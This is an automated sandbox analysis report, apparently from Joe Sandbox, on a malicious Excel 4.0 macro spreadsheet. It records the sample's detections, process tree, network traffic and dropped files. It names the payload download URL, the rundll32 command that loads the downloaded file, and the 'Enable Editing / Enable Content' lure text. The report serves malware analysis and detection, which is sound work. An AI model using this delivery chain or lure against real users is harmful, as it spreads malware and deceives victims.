
Analysis Report Document1094680387_02012021.xls

Overview

General Information

Sample Name: Document1094680387_02012021.xls
Analysis ID: 356299
MD5: 9423ee9775707d51960e0eac95b3f6cc
SHA1: debc0defc997fde77a2f0cee9b3b1fcbed54ea91
SHA256: 7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2200 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2372 cmdline: rundll32 ..\MORI.BAST,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Document1094680387_02012021.xls | SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth | 0xaf0b:$e1: Enable Editing; 0xaf55:$e1: Enable Editing; 0xaf73:$e2: Enable Content
Document1094680387_02012021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security | -

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data: Command: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2200, ProcessCommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, ProcessId: 2372

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: healthymachinery.com, Virustotal: Detection: 8%
Source: http://healthymachinery.com/health/32-422-76.assp, Virustotal: Detection: 8%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe

Networking:

Source: global traffic DNS query: name: healthymachinery.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.149.197:80
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected:
  GET /health/32-422-76.assp HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: healthymachinery.com
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: healthymachinery.com
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: 32-422-76[1].htm.0.dr String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 1 11 12 1 from the yellow bar above 13 14 1 @Once You have Enable Editing, please
Source: Screenshot number: 4 Screenshot OCR: Enable Content 15 1 from the yellow bar above 16 CI 17 I " I WHY I CANNOTOPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8 Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulas
Source: Document1094680387_02012021.xls Initial sample: EXEC
Source: Document1094680387_02012021.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal76.expl.evad.winXLS@3/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\76CE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBE9D.tmp
Source: Document1094680387_02012021.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Document1094680387_02012021.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Document1094680387_02012021.xls, type: SAMPLE

Mitre Att&ck Matrix

Numbers in parentheses give the count of signatures mapped to that technique.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting (1) | Path Interception | Process Injection (1) | Masquerading (1) | OS Credential Dumping | File and Directory Discovery (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (23) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | System Information Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll32 (1) | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (1) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (1) | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -

Behavior Graph

(Graph not reproduced. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
healthymachinery.com | 8% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://healthymachinery.com/health/32-422-76.assp | 8% | Virustotal | -
http://healthymachinery.com/health/32-422-76.assp | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
healthymachinery.com | 172.67.149.197 | true | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://healthymachinery.com/health/32-422-76.assp | true | 8% Virustotal; Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2084703023.0000000001D97000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2084485230.0000000001BB0000.00000002.00000001.sdmp | false | - | high
https://www.cloudflare.com/5xx-error-landing | 32-422-76[1].htm.0.dr | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.149.197 | unknown | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356299
Start date: 22.02.2021
Start time: 21:42:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Document1094680387_02012021.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLS@3/8@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\32-422-76[1].htm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text
Category: downloaded
Size (bytes): 4318
Entropy (8bit): 4.978706497143023
Encrypted: false
SSDEEP: 96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD
MD5: 2885250688BD4C1C1BB0ABE37E258DDC
SHA1: A0C1355880E29CA2B53A875CB3C296FA6E7EA829
SHA-256: BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4
SHA-512: BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364
Malicious: false
Reputation: low
IE Cache URL: http://healthymachinery.com/health/32-422-76.assp
Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

C:\Users\user\AppData\Local\Temp\B5CE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 26497
Entropy (8bit): 7.568364582865906
Encrypted: false
SSDEEP: 384:1nnowDuBP+y+mjZ0VTquDznB3dPjZ8aoVT0QNuzWKPqGndVVBdd:1nnlDuBP+Tmje3nXPj6W+u7qkPLdd
MD5: F3B6E4C5C9FA1158B6FAC9252C28F970
SHA1: 0EF9E1DCD12EE01EB92F610564D8AEB7F1F67A98
SHA-256: 569F33677C782BF3A4C8421D4F3C6A76BEEBB41DD2FD3D845C37193758254461
SHA-512: D3C42FBAEBE32348686ADFCCA0E00E3EC2F3977DCAA0C74BAE0200A835993113D0112B017CACECBD884B4B4FD542257144F26C06D679A3E8514B7C641940B7AE
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 04:42:36 2021, atime=Tue Feb 23 04:42:36 2021, length=12288, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.468842484038273
Encrypted: false
SSDEEP: 12:85Qc0LgXg/XAlCPCHaXgzB8IB/iGkZX+Wnicvb4AubDtZ3YilMMEpxRljKXlcTdK:85Zi/XTwz6IAjYekAiDv3qPrNru/
MD5: E382379E6F8EC21891A4C09FC78B2C33
SHA1: 81B9B99F3BF9B4519E6ED6013413BF3327D48BF3
SHA-256: 657B78085B6180BD0BADC5FF6667219E2DF14FC6FC2FA0A0A4F1F550AF56C650
SHA-512: 53FD2827C93CB851ED840261AE22E4BEEC4D398B091B823C95D7F8EF092FCFD3998612EB1866F694502555110424FF591234D659DF437E9DB1A3EFB1521872A0
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Document1094680387_02012021.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Tue Feb 23 04:42:36 2021, atime=Tue Feb 23 04:42:36 2021, length=44032, window=hide
Category: dropped
Size (bytes): 2198
Entropy (8bit): 4.500480590351624
Encrypted: false
SSDEEP: 24:8HYn/XTwz6I4U8WcqFekAxqZDv3qPdM7dD2HYn/XTwz6I4U8WcqFekAxqZDv3qPg:8M/XT3Ing+YJPQh2M/XT3Ing+YJPQ/
MD5: 401E0C09D6A3D5BFFF6B567EC7699127
SHA1: 2D7471A620659CF28658DD30702654F86E33A703
SHA-256: BB865549E2FD35FE53C099CBFF8746859936D9F6706558D4860DAA8B0D134E19
SHA-512: 0018087D2F3EAF6D42CE5E01C82F38AE074D4D6FB6F0E2CAB1AAC6B23E153474C42F2A669F8AC6897DA8679A6290202F39F65D70584CE860084F868DD9561772
Malicious: false
Reputation: low
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):134
                  Entropy (8bit):4.703385008978903
                  Encrypted:false
                  SSDEEP:3:oyBVomMUdRRMJ9+XVEAl5S/dRRMJ9+XVEAlmMUdRRMJ9+XVEAlv:dj6zJVArS6JVAxzJVA1
                  MD5:5DBCC3E3BA539EAC9E456E71F44E7F4C
                  SHA1:26A9F73B250A22119F585C58096C6DC174B354BD
                  SHA-256:05CEF3F9B120D1E67A3F7A67F8578A2EE56E1060EAC5FFDF8F572BB4834127B7
                  SHA-512:48814DA9A0B6A1A2EFEF65B0FA6617508E2514227CC48B215F3716412375C072A8FD97C3A9EC54463E3A4DAAE0CA9BC26D4D5686D5DEED9F6CAF12B63F7D54C4
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.LNK=0..[xls]..Document1094680387_02012021.LNK=0..Document1094680387_02012021.LNK=0..[xls]..Document1094680387_02012021.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LI22RCU4.txt
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):122
                  Entropy (8bit):4.5618514532497425
                  Encrypted:false
                  SSDEEP:3:GmM/5DyQiqWyD0XQvHU8VXT7OHHRESNSRcuRYigjmXReWpD:XM/5DD1D3JuHS3cuKjmUWpD
                  MD5:D84B2823208AF224D4942EC7FD77CBBF
                  SHA1:8D9C717B32324F197502E20EFBB1C3763DADF579
                  SHA-256:DECCE67F750C39C9B6D2E721D97DA196327CF7DFA3EFF790508D756D969F7739
                  SHA-512:51CA3F9B77C8B41E2EAAACCE191D11AA08663F7C208A56B55D998FCA9B9B4BD28C457F9BEBD6112272D17A9682C8C19A2257E3E3646613B1912333D88FA6BBEB
                  Malicious:false
                  Reputation:low
                  IE Cache URL:healthymachinery.com/
                  Preview: __cfduid.de9fb75c2785608345f9f59dfba82579b1614026581.healthymachinery.com/.9728.1204975744.30875886.2966600249.30869926.*.
                  C:\Users\user\Desktop\76CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):69069
                  Entropy (8bit):6.230482106115366
                  Encrypted:false
                  SSDEEP:1536:nZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdEfq6PkHZ8rmjAItyzElBIL6lECbgT:nZ8rmjAItyzElBIL6lECbgBGGP5xLm7W
                  MD5:7C0537F4EBF1358F614989AABC178980
                  SHA1:0376B456E68893C84F61273EF06BC7D12FE22ED8
                  SHA-256:0DB14CEF15D668DC42C8AD731EB42B0CDCB21E33D3D3C1AFA9010805EB725F9A
                  SHA-512:38D05E80CCDA7B63F291E068291430D9F9B2E0EDDD440ACD0C9E461A88E10BE894C17E786EC793CE2113BCA9778E6B26F0BAD2C59E9D826C6A354483AF823F4C
                  Malicious:false
                  Reputation:low
                  Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.............
                  C:\Users\user\MORI.BAST
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:HTML document, ASCII text
                  Category:dropped
                  Size (bytes):4318
                  Entropy (8bit):4.978706497143023
                  Encrypted:false
                  SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD
                  MD5:2885250688BD4C1C1BB0ABE37E258DDC
                  SHA1:A0C1355880E29CA2B53A875CB3C296FA6E7EA829
                  SHA-256:BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4
                  SHA-512:BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364
                  Malicious:false
                  Reputation:low
                  Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 1 14:40:50 2021, Security: 0
                  Entropy (8bit):3.9082210251254503
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:Document1094680387_02012021.xls
                  File size:64512
                  MD5:9423ee9775707d51960e0eac95b3f6cc
                  SHA1:debc0defc997fde77a2f0cee9b3b1fcbed54ea91
                  SHA256:7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634
                  SHA512:0cff3519c5453bdeb13201849c571cbb142ed6780c2e6cae572104904af1190ff4d4e068ff0109953745b153fc219c618519318cadd4dcac300b3d280643bc53
                  SSDEEP:1536:TcPiTQAVW/89BQnmlcGvgZ6GrvhpJ8YUOMUt/BI/s/Vk/OZ/R/7/Gm/UQ/OhGW/x:TcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOA
                  File Content Preview:........................>.......................|...........................{..................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Document1094680387_02012021.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:Friner
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-01 14:40:50
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.292801571342
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . B a s e . . . . . K l o p s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 70 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.271885406754
                  Base64 Encoded:False
